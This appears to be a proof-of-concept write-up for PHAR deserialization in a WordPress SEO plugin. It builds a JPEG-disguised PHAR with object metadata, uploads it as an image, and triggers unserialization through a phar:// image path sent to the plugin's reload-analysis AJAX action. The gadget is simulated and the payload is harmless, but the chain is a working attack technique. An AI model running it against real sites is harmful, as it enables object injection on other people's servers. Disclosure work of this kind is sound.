1. Use a WordPress instance on PHP 7.x.
2. Create a PHP file `create_phar.php` with the following code:

    class Evil {}

    // create new Phar
    $phar = new Phar('poc.phar');
    $phar->addFromString('test.png', 'text');
    $phar->setStub("\xff\xd8\xff\n<?php __HALT_COMPILER(); ?>");
    $phar->setMetadata(new Evil());
3. Create the PHAR file `poc.phar` by running `php --define phar.readonly=0 create_phar.php`
4. Rename `poc.phar` to `poc.jpg`
5. Upload `poc.jpg` using the Media Editor. Take note of its path within `wp-content/uploads`
6. Add the following code to the site in order to simulate a gadget:
    class Evil {
      public function __wakeup() : void {
        die("Arbitrary deserialization");

7. Create or edit a post or page in the block editor. Add an `HTML` block with the following contents (but replace any parts of the path to `poc.jpg` as needed for your test server).
    <img src="phar://../wp-content/uploads/2023/03/poc.jpg/test.txt">
8. Without saving the post or page, open the browser console to view network traffic, then click on “Reload Analysis” in the “SEO Page Optimization” section. Notice the `admin-ajax` request with `action=wpms` and `task=reload_analysis` returns with the text “Arbitrary deserialization”, demonstrating the vulnerability.